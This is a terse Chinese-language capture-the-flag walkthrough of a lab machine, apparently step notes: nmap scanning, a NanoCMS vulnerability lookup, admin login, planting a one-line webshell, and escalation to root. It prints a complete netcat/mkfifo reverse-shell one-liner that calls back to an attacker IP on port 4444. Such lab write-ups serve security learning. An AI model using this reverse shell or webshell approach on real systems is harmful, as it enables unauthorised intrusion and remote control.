CTF-5
发现目标靶机

nmap扫描端口

访问80端口

搜索NanoCMS的一些漏洞 https://cxsecurity.com/issue/WLB-2009040041

访问该页面

解码

登录后台

写入一句话木马

连接成功

反弹shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.15.137 4444 >/tmp/f

在prtaick的目录下发现几个特殊的文件

依次下载

???? 直接切换root

完